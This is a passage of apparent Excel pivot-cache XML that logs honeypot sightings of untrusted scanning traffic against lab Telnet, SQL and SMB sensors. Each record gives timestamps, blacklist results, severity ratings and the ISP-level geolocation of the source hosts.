    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6ad6:e98a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2354"/>
    <x v="2354"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T09:47:08"/>
    <d v="2023-09-07T17:17:00"/>
    <d v="2025-04-10T09:47:08"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="445&amp;&amp;3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'exploits']}"/>
    <n v="152"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2008-11-04"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (113.160.100.129,32916)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71a0:6481"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2355"/>
    <x v="2355"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T09:37:58"/>
    <d v="2025-04-10T09:37:58"/>
    <d v="2025-04-10T09:37:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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6:959"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2356"/>
    <x v="2356"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T09:11:16"/>
    <d v="2025-04-10T04:48:15"/>
    <d v="2025-04-10T09:11:16"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="AO"/>
    <s v="Angola"/>
    <s v="LUA"/>
    <s v="Luanda"/>
    <s v="Luanda Municipality"/>
    <s v="Luanda"/>
    <s v="2240449"/>
    <s v="NA"/>
    <s v="-8.81466"/>
    <s v="13.2302"/>
    <s v="11259"/>
    <s v="Angola Telecom"/>
    <s v="Angola Telecom"/>
    <s v="business"/>
    <s v="ClientesDiversos"/>
    <s v="2012-02-24"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c5d9:8ebf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2357"/>
    <x v="2357"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T09:07:24"/>
    <d v="2025-04-10T09:07:24"/>
    <d v="2025-04-10T09:07:24"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Fazilka"/>
    <s v="Fazilka"/>
    <s v="1271891"/>
    <s v="NA"/>
    <s v="30.4021"/>
    <s v="74.0284"/>
    <s v="137655"/>
    <s v="AANS-AS-IN"/>
    <s v="I T Solution"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:678d:85d4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2358"/>
    <x v="2358"/>
    <s v="NA"/>
    <x v="9"/>
    <d v="2025-04-10T09:00:49"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-10T09:00:49"/>
    <n v="100"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;abuse.ch&amp;&amp;SMA-LAB_DNS_H8&amp;&amp;SMA-LAB_MT-CPA_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;53&amp;&amp;14850"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="ET"/>
    <s v="Ethiopia"/>
    <s v="AA"/>
    <s v="Addis Ababa"/>
    <s v="Arada"/>
    <s v="Addis Ababa"/>
    <s v="344979"/>
    <s v="NA"/>
    <s v="9.02427"/>
    <s v="38.7519"/>
    <s v="24757"/>
    <s v="EthioNet"/>
    <s v="Ethiotelecom"/>
    <s v="business"/>
    <s v="IP Pool for IPOE AD"/>
    <s v="2015-10-12"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4bd:27a3"/>
    <s v="None&amp;&amp;C-U"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2359"/>
    <x v="2359"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T08:39:42"/>
    <d v="2025-04-10T03:20:17"/>
    <d v="2025-04-10T08:39:42"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:2426"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2360"/>
    <x v="2360"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T07:42:55"/>
    <d v="2025-04-10T07:40:58"/>
    <d v="2025-04-10T07:42:55"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.18104"/>
    <s v="106.826"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. TELKOM INDONESIA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2009-10-20"/>
    <s v="TLKM_BB_SERVICE_180_251_DIVRE1"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4fb:a21"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2361"/>
    <x v="2361"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T06:49:04"/>
    <d v="2025-03-07T05:10:34"/>
    <d v="2025-04-10T06:49:04"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:40b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2362"/>
    <x v="2362"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T06:41:43"/>
    <d v="2025-04-10T06:41:43"/>
    <d v="2025-04-10T06:41:43"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:a24"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2363"/>
    <x v="2363"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T06:37:46"/>
    <d v="2025-04-09T21:46:45"/>
    <d v="2025-04-10T06:37:46"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:eed:6a50"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2364"/>
    <x v="2364"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T06:14:16"/>
    <d v="2023-08-08T15:31:00"/>
    <d v="2025-04-10T06:14:16"/>
    <n v="716"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;38386&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc76:e180"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2365"/>
    <x v="2365"/>
    <s v="60-249-3-202.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-10T06:13:35"/>
    <d v="2024-04-03T22:13:00"/>
    <d v="2025-04-10T06:13:35"/>
    <n v="4326"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H19&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;32177&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3cf9:3ca"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2366"/>
    <x v="2366"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T06:07:36"/>
    <d v="2024-12-07T20:18:48"/>
    <d v="2025-04-10T06:07:36"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c8:bd63"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2367"/>
    <x v="2367"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T05:48:01"/>
    <d v="2025-04-10T05:48:01"/>
    <d v="2025-04-10T05:48:01"/>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e:80bc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2368"/>
    <x v="2368"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T05:41:20"/>
    <d v="2025-04-10T05:41:20"/>
    <d v="2025-04-10T05:41:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Bharti International Singapore PTE LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:206b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2369"/>
    <x v="2369"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T05:14:41"/>
    <d v="2025-04-10T05:14:41"/>
    <d v="2025-04-10T05:14:41"/>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e:888e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2370"/>
    <x v="2370"/>
    <s v="pl46760.ag2525.nttpc.ne.jp"/>
    <x v="0"/>
    <d v="2025-04-10T04:43:34"/>
    <d v="2025-04-03T17:01:29"/>
    <d v="2025-04-10T04:43:34"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="14"/>
    <s v="Kanagawa"/>
    <s v="Yokohama"/>
    <s v="Enokichō"/>
    <s v="11081570"/>
    <s v="NA"/>
    <s v="35.4304"/>
    <s v="139.614"/>
    <s v="2514"/>
    <s v="NTT PC Communications, Inc."/>
    <s v="NTT PC Communications, Inc."/>
    <s v="business"/>
    <s v="InfoSphere"/>
    <s v="1997-08-04"/>
    <s v="JPNIC-NET-JP"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['ns1.sphere.ad.jp', 'ns2.sphere.ad.jp']"/>
    <s v="NA"/>
    <s v="Connected (2025/08/31)"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d2a5:8ea8"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2371"/>
    <x v="2371"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T04:38:47"/>
    <d v="2025-04-10T04:38:47"/>
    <d v="2025-04-10T04:38:47"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
